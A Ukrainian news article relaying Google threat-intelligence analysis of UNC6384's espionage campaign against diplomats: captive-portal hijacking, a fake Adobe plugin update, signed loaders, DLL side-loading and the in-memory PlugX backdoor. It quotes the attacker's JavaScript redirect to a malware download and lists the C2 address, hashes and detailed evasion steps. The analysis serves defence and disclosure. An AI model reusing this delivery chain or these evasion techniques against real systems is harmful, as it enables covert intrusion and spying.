21.08.2025
1 хв
642
Китайські кібершпигуни продовжують удосконалювати методи атак, використовуючи підроблені оновлення та перехоплення інтернет-трафіку. За даними Google Threat Intelligence Group, PRC-нексус угруповання спрямувало кампанію проти дипломатів у Південно-Східній Азії та за її межами. Зловмисники застосували складний ланцюг зараження: підроблені сторінки з «оновленнями», завантажувач STATICPLUGIN із цифровим підписом, прихований модуль CANONSTAGER та шкідливий бекдор SOGU.SEC (PlugX). Такий підхід дозволив уникати антивірусного виявлення й зберігати присутність у системах жертв.
У березні 2025 року Google Threat Intelligence Group (GTIG) виявила складну, багатогранну кампанію, яку приписують кібершпигунському актору UNC6384, зв’язаному з КНР. Кампанія була спрямована на дипломатів у Південно-Східній Азії та інших організаціях у всьому світі. GTIG оцінює, що це, ймовірно, було спрямовано на підтримку операцій кібершпигунства, що відповідають стратегічним інтересам Китайської Народної Республіки (КНР).
Кампанія захоплює цільовий веб-трафік, використовуючи перенаправлення через портал, щоб доставити завантажувач із цифровим підписом, який GTIG відстежує як STATICPLUGIN. Зрештою це призвело до розгортання в оперативній пам’яті бекдору SOGU.SEC (також відомого як PlugX). Цей багатоетапний ланцюг атак використовує передову соціальну інженерію, включаючи дійсні сертифікати підпису коду, атаку типу «злочинець посередині» (AitM) та методи непрямого виконання, щоб уникнути виявлення.
Google активно захищає своїх користувачів і клієнтів від цієї загрози. Ми надіслали сповіщення про зловмисників, яких підтримує уряд, усім користувачам Gmail і Workspace, на яких вплинула ця кампанія. Ми закликаємо користувачів увімкнути розширений безпечний перегляд для Chrome, забезпечити повне оновлення всіх пристроїв і ввімкнути двоетапну перевірку в облікових записах. Крім того, всі виявлені домени, URL-адреси та хеші файлів було додано до списку небезпечних веб-ресурсів Безпечного перегляду Google. Служба безпеки Google (SecOps) також була оновлена відповідними даними, що дозволяє захисникам виявляти таку активність у своєму середовищі.
У цій публікації блогу представлені наші висновки та аналіз цієї шпигунської кампанії, а також еволюція операційних можливостей зловмисника. Ми розглядаємо, як доставляється шкідливе програмне забезпечення, як зловмисник використовував методи соціальної інженерії та ухилення, а також технічні аспекти багатоетапного використання шкідливого програмного забезпечення.
У цій кампанії корисні навантаження шкідливого програмного забезпечення маскувалося під оновлення програмного забезпечення або плагінів і доставлялося через інфраструктуру UNC6384 з використанням тактик AitM та соціальної інженерії. Загальний огляд ланцюжка атак:
Веббраузер цільового пристрою перевіряє, чи знаходиться інтернет-з’єднання за порталом доступу;
AitM перенаправляє браузер на вебсайт, контрольований зловмисником;
Завантажується шкідливе програмне забезпечення першого етапу, STATICPLUGIN;
Потім STATICPLUGIN отримує MSI-пакет з того ж веб-сайту;
Зрештою, CANONSTAGER завантажується DLL-бібліотекою та розгортає бекдор SOGU.SEC.
GTIG виявила докази використання викрадення порталу-перехоплення для доставки шкідливого програмного забезпечення, замаскованого під оновлення плагіна Adobe, цільовим об’єктам. Портал-перехоплення — це мережева конфігурація, яка спрямовує користувачів на певну веб-сторінку, зазвичай на сторінку входу або заставки, перш ніж надати доступ до Інтернету. Ця функціональність навмисно вбудована в усі веббраузери. Браузер Chrome виконує HTTP-запит до жорстко закодованої URL-адреси ( “http://www.gstatic.com/generate_204“), щоб активувати цей механізм перенаправлення.
Хоча « gstatic.com» є легітимним доменом, наше розслідування виявило ланцюжки перенаправлень з цього домену, що ведуть до цільової веб-сторінки зловмисника та подальшої доставки шкідливого програмного забезпечення, що вказує на атаку AitM. Ми оцінюємо, що AitM була здійснена через скомпрометовані периферійні пристрої в цільових мережах. Однак GTIG не спостерігала вектора атаки, який використовувався для компрометації периферійних пристроїв.
Після перенаправлення зловмисник намагається обдурити ціль, змусивши її повірити, що потрібне оновлення програмного забезпечення, та завантажити шкідливе програмне забезпечення, замасковане під «оновлення плагіна». Зловмисник використовував кілька методів соціальної інженерії, щоб створити цілісну та достовірну тему оновлення.
Цільова веб-сторінка нагадує легітимний сайт оновлення програмного забезпечення та використовує HTTPS-з’єднання з дійсним TLS-сертифікатом, виданим Let’s Encrypt. Використання HTTPS пропонує кілька переваг для соціальної інженерії та доставки шкідливого програмного забезпечення. Попередження браузера, такі як «Незахищено» та «Ваше з’єднання не є приватним», не відображатимуться цільовій платформі, а з’єднання з веб-сайтом зашифроване, що ускладнює мережевим захистом перевірку та виявлення шкідливого трафіку. Крім того, корисне навантаження шкідливого програмного забезпечення маскується під легітимне програмне забезпечення та має цифровий підпис сертифікатом, виданим центром сертифікації.
$ openssl x509 -in mediareleaseupdates.pem -noout -text -fingerprint -sha256
Certificate:
Data:
Version: 3 (0x2)
Serial Number:
05:23:ee:fd:9f:a8:7d:10:b1:91:dc:34:dd:ee:1b:41:49:bd
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R10
Validity
Not Before: May 17 16:58:11 2025 GMT
Not After : Aug 15 16:58:10 2025 GMT
Subject: CN=mediareleaseupdates[.]com
sha256 Fingerprint=6D:47:32:12:D0:CB:7A:B3:3A:73:88:07:74:5B:6C:F1:51:A2:B5:C3:31:65:67:74:DF:59:E1:A4:E2:23:04:68
Сертифікат TLS веб-сайту
Початкова цільова сторінка повністю порожня з жовтою смугою угорі та кнопкою з написом « Install Missing Plugins…». Якщо цей метод успішно обманить ціль, змусивши її повірити, що їй потрібно встановити додаткове програмне забезпечення, вона може бути більш охоче вручну обійти захист безпеки Windows на базі хоста, щоб виконати доставлене шкідливе корисне навантаження.
У фоновому режимі код Javascript завантажується з файлу скрипта з назвою « style3.js», розміщеного на тому ж домені, що й HTML-сторінка. Коли цільова об’єктна точка натискає кнопку встановлення « myFunction», яка знаходиться в завантаженому скрипті, виконується.
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Additional plugins are required to display all the media on this page</title>
<script type="text/javascript" src="https//mediareleaseupdates[.]com/style3.js"> </script>
</head>
<body><div id="adobe update" onclick="myFunction()"...
Javascript зAdobePlugins.html
Всередині « myFunction» завантажується інше зображення для відображення як фонове зображення на веб-сторінці. Розташування вікна браузера також встановлюється на URL-адресу виконуваного файлу, знову розміщеного на тому ж домені.
function myFunction()
{
var img = new Image();
img.src ="data:image/png;base64,iVBORw0KGgo[cut]
...
document.body.innerHTML = '';
document.body.style.backgroundImage = 'url(' + img.src + ')';
...
window.location.href = "https//mediareleaseupdates[.]com/AdobePlugins.exe";
}
Javascript зstyle3.js
Це запускає автоматичне завантаження « AdobePlugins.exe» та нового фонового зображення, яке відображатиметься на веб-сторінці. Зображення показує інструкції щодо виконання завантаженого бінарного файлу та обходу потенційних засобів захисту Windows.
Під час запуску завантаженого виконуваного файлу на екрані відображається фальшиве запрошення на встановлення, яке видно на скріншоті вище для «КРОКУ 2», разом із опціями « Install» та « Cancel». Однак, корисне навантаження SOGU.SEC, ймовірно, вже запущено на цільовому пристрої, оскільки жодна з кнопок не запускає жодної дії, пов’язаної зі шкідливим програмним забезпеченням.
Після успішної доставки до цільової системи Windows, шкідливе програмне забезпечення ініціює багатоетапний ланцюжок розгортання. Кожен етап передбачає тактики, спрямовані на обхід захисту хоста та підтримку прихованості в ураженій системі. Нарешті, нова DLL-бібліотека, що завантажується збоку та відстежується як CANONSTAGER, завершується розгортанням бекдора SOGU.SEC в оперативній пам’яті, який потім встановлює зв’язок із сервером командування та управління (C2) зловмисника.
Завантажений AdobePlugins.exeфайл « » є завантажувачем шкідливого програмного забезпечення першого етапу. Файл був підписаний компанією Chengdu Nuoxin Times Technology Co., Ltd. дійсним сертифікатом, виданим GlobalSign. Підписане шкідливе програмне забезпечення має головну перевагу – здатність обходити засоби захисту кінцевих точок, які зазвичай довіряють файлам із дійсними цифровими підписами. Це надає шкідливому програмному забезпеченню фальшивої легітимності, що ускладнює його виявлення як користувачам, так і автоматизованим захисним системам.
Бінарний файл був підписаний кодом 9 травня 2025 року, що, можливо, вказує на те, як довго ця версія завантажувача використовувалася. Хоча термін дії сертифіката підпису минув 14 липня 2025 року і він більше не дійсний, зловмиснику може бути легко повторно підписати нові версії STATICPLUGIN за допомогою аналогічно отриманих сертифікатів.
STATICPLUGIN реалізує власну TForm, яка маскується під легітимний інсталятор Microsoft Visual C++ 2013 Redistributables. Шкідливе програмне забезпечення використовує об’єкт Windows COM Installer для завантаження іншого файлу з « https//mediareleaseupdates[.]com/20250509[.]bmp». Однак файл «BMP» насправді є MSI-пакетом, що містить три файли. Після встановлення цих файлів CANONSTAGER виконується через стороннє завантаження DLL.
Ім’я файлу Опис Хеш
cnmpaui.exe Canon IJ Printer Assistant Tool 4ed76fa68ef9e1a7705a849d47b3d9dcdf969e332bd5bcb68138579c288a16d3
cnmpaui.dll CANONSTAGER e787f64af048b9cb8a153a0759555785c8fd3ee1e8efbca312a29f2acb1e4011
cnmplog.dat RC4 Encrypted SOGU.SEC cc4db3d8049043fa62326d0b3341960f9a0cf9b54c2fbbdffdbd8761d99add79
Наше розслідування виявило, що це не перший підозрілий виконуваний файл, підписаний сертифікатом, виданим Chengdu Nuoxin Times Technology Co., Ltd. GTIG наразі відстежує 25 відомих зразків шкідливого програмного забезпечення, підписаних цим підписником, які використовуються кількома кластерами активності PRC-nexus. Багато прикладів цих підписаних бінарних файлів доступні на VirusTotal.
GTIG раніше розслідувала дві додаткові кампанії з використанням шкідливого програмного забезпечення, підписано цією організацією. Хоча GTIG не пов’язує ці інші кампанії з UNC6384, вони мають численні подібності та збіги TTP з цією кампанією UNC6384, окрім використання тих самих сертифікатів підпису коду.
Доставка через веб-переадресації
Перший етап завантаження, іноді упакований в архів.
Внутрішньопам’ятні дроппери та корисні навантаження бекдору, що працюють лише в пам’яті
Маскування під легітимні програми або оновлення
Таргетинг у Південно-Східній Азії
Залишається відкритим питання, як зловмисники отримують ці сертифікати. Організація-передплатник може бути жертвою зі скомпрометованим матеріалом для підпису коду. Однак, вона також може бути добровільним учасником або підставною компанією, що сприяє операціям кібершпигунства. Зразки шкідливого програмного забезпечення, підписані Chengdu Nuoxin Times Technology Co., Ltd, датуються щонайменше січнем 2023 року. GTIG продовжує стежити за зв’язком між цією організацією та кіберопераціями PRC-nexus.
Після виконання CANONSTAGER його кінцевою метою є приховане виконання зашифрованого корисного навантаження, варіанта SOGU, що відстежується як SOGU.SEC. CANONSTAGER реалізує техніку обфускації потоку керування, використовуючи користувацьке хешування API та локальне сховище потоків (TLS). Запускова програма також використовує легітимні функції Windows, такі як віконні процедури, черги повідомлень та функції зворотного виклику, для виконання остаточного корисного навантаження.
Локальне сховище потоків (TLS) призначене для забезпечення кожного потоку в багатопотоковій програмі власним приватним сховищем даних. CANONSTAGER використовує структуру даних масиву TLS для зберігання адрес функцій, визначених за допомогою власного алгоритму хешування API. Адреси функцій пізніше викликаються по всьому двійковому файлу зі зміщень у масив TLS.
Коротше кажучи, хешування API приховує, які API Windows використовуються, тоді як масив TLS забезпечує приховане місце для зберігання розв’язаних адрес функцій. Використання масиву TLS для цієї мети є нетрадиційним. Зберігання адрес функцій тут може бути пропущено аналітиками або інструментами безпеки, які ретельно досліджують більш поширені місця зберігання даних.
Нижче наведено приклад того, як CANONSTAGER розв’язує та зберігає GetCurrentDirectoryW адресу функції.
Вирішити проблему з хешем GetCurrentDirectoryW (0x6501CBE1)
Отримати розташування масиву TLS з блоку інформації про потоки (TIB)
Перемістити адресу розв’язаної функції у зміщення 0x8 масиву TLS
CANONSTAGER приховує свій код запуску в користувацькій віконній процедурі та запускає її виконання опосередковано, використовуючи чергу повідомлень Windows. Використання цих легітимних функцій Windows знижує ймовірність виявлення шкідливого програмного забезпечення та створення сповіщень інструментами безпеки. Це також приховує потік керування шкідливим програмним забезпеченням, «приховуючи» його код всередині віконної процедури та запускаючи виконання асинхронно.
На високому рівні, CANONSTAGER:
Реєструє клас, що містить функцію зворотного виклику;
Створює нове вікно із зареєстрованим класом;
Надсилає WM_SHOWWINDOW до черги повідомлень;
Входить у цикл обміну повідомленнями для отримання та відправлення повідомлень до створеного вікна;
Створює новий потік для розшифрування “
cnmplog.dat” як SOGU.SEC, коли вікно отримує повідомлення WM_SHOWWINDOW; потім
Виконує SOGU.SEC в пам’яті з використанням зворотного виклику EnumSystemGeoID.
У системі Windows кожен клас вікна має пов’язану з ним процедуру вікна. Процедура дозволяє програмістам визначити власну функцію для обробки повідомлень, надісланих до вказаного класу вікна.
CANONSTAGER створює перекриваюче вікно (Overlapped Window) із зареєстрованою структурою WNDCLASS. Структура містить функцію зворотного виклику до визначеної програмістом процедури вікна для обробки повідомлень. Крім того, вікно створюється з нульовою висотою та шириною, щоб залишатися прихованим на екрані.
Всередині віконної процедури відбувається перевірка на наявність повідомлення типу 0x0018 (WM_SHOWWINDOW). Коли отримується повідомлення цього типу, створюється новий потік з функцією, яка розшифровує та запускає корисне навантаження SOGU.SEC. Для будь-якого типу повідомлення, відмінного від 0x0018 (або 0x2 для ExitProcess ), віконна процедура викликає обробник за замовчуванням ( DefWindowProc ), ігноруючи повідомлення.
Програми Windows використовують черги повідомлень для асинхронного зв’язку. Як користувацькі програми, так і система Windows можуть надсилати повідомлення до черг повідомлень. Коли повідомлення надсилається до вікна програми, система викликає відповідну процедуру вікна для обробки повідомлення.
Щоб запустити процедуру шкідливого вікна, CANONSTAGER використовує функцію ShowWindow для надсилання повідомлення WM_SHOWWINDOW (0x0018) до свого щойно створеного вікна через чергу повідомлень. Оскільки система або інші програми також можуть надсилати повідомлення до вікна CANONSTAGER, запускається стандартний цикл повідомлень Windows. Це дозволяє надсилати всі надіслані повідомлення, включаючи заплановане повідомлення WM_SHOWWINDOW.
GetMessageW – отримати всі повідомлення в черзі повідомлень потоку.
TranslateMessage — Перетворює повідомлення з «віртуального ключа» на «символьне повідомлення».
DispatchMessage – доставляє повідомлення до певної функції (WindowProc), яка обробляє повідомлення для вікна, на яке спрямоване це повідомлення.
Повертайтеся до 1, доки всі повідомлення не будуть відправлені.
Після того, як віконна процедура отримає повідомлення правильного типу, CANONSTAGER переходить до розгортання корисного навантаження SOGU.SEC, виконавши такі кроки:
Прочитайте зашифрований
cnmplog.datфайл « », що міститься в завантаженому MSI-файлі;
Розшифруйте файл за допомогою жорстко закодованого 16-байтового ключа RC4;
Виконайте розшифроване корисне навантаження за допомогою функції зворотного виклику EnumSystemsGeoID .
Раніше UNC6384 використовував як шифрування корисного навантаження, так і функції зворотного виклику для розгортання SOGU.SEC. Ці методи використовуються для приховування шкідливого коду, уникнення виявлення, обфускації потоку керування та злиття зі звичайною активністю системи. Крім того, всі ці кроки виконуються в пам’яті, уникаючи виявлення на основі файлів кінцевих точок.
SOGU.SEC – це окремий варіант SOGU, який зазвичай використовується UNC6384 у кібершпигунській діяльності. Це складний та сильно завуальований бекдор для шкідливого програмного забезпечення з широким спектром можливостей. Він може збирати системну інформацію, завантажувати та вивантажувати файли з C2, а також виконувати віддалену командну оболонку. У цій кампанії було помічено, що SOGU.SEC безпосередньо зв’язується з IP-адресою C2 « 166.88.2[.]90» за допомогою HTTPS.
GTIG приписує цю кампанію UNC6384, групі кібершпигунів, що входить до зв’язку з КНР та групою TEMP.Hex (також відомою як Mustang Panda). Наша атрибуція ґрунтується на подібності в інструментах, партнерських програмах захисту, цільових орієнтаціях та перетинах в інфраструктурі командування та управління (C2). Спостерігалося, що UNC6384 та TEMP.Hex атакують урядові сектори, переважно у Південно-Східній Азії, відповідно до стратегічних інтересів КНР. Також було відзначено, що обидві групи розповсюджують шкідливе програмне забезпечення SOGU.SEC з DLL-завантажувачів шкідливих програм та використовують ту саму інфраструктуру C2.
Ця кампанія є яскравим прикладом постійного розвитку операційних можливостей UNC6384 та підкреслює витонченість зловмисників, пов’язаних з PRC-nexus. Використання передових методів, таких як AitM, у поєднанні з дійсним підписанням коду та багаторівневою соціальною інженерією, демонструє можливості цього зловмисника. Ця діяльність відповідає ширшій тенденції, яку спостерігає GTIG, коли зловмисники, пов’язані з PRC-nexus, все частіше використовують приховану тактику, щоб уникнути виявлення.
GTIG активно відстежує поточні загрози з боку таких суб’єктів, як UNC6384, щоб захистити користувачів і клієнтів. У рамках цих зусиль Google постійно оновлює свої засоби захисту та вжила конкретних заходів проти цієї кампанії.
